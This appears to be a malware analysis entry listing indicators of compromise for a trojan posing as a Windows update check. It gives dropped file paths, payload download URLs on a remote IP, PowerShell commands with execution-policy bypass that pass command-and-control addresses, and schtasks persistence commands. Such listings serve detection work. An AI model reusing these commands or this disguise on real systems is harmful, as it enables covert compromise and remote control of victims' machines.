Technical Information
- <SYSTEM32>\tasks\windowsupdatechecktask1
- %ALLUSERSPROFILE%\windowsupdatecheck\unload.tmp
- %ALLUSERSPROFILE%\windowsupdatecheck\updatecheck.ps1
- %ALLUSERSPROFILE%\windowsupdatecheck\updatecheck.exe
- %ALLUSERSPROFILE%\windowsupdatecheck\control.dll
- %TEMP%\wscript2.xml
- http://42.###.54.48:8081/UpdateCheck.exe via 42.##2.54.48
- http://42.###.54.48:8081/control.dll via 42.##2.54.48
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %ALLUSERSPROFILE%\WindowsUpdateCheck\UpdateCheck.ps1 42.192.54.48 8080 8081
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %ALLUSERSPROFILE%\WindowsUpdateCheck\UpdateCheck.ps1 42.192.54.48 8080 8081' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C "schtasks /create /xml C:\\Users\\user\\AppData\\Local\\Temp\\wscript2.xml /tn windowsUpdateCheckTask1 /F"
- '%WINDIR%\syswow64\schtasks.exe' /create /xml C:\\Users\\user\\AppData\\Local\\Temp\\wscript2.xml /tn windowsUpdateCheckTask1 /F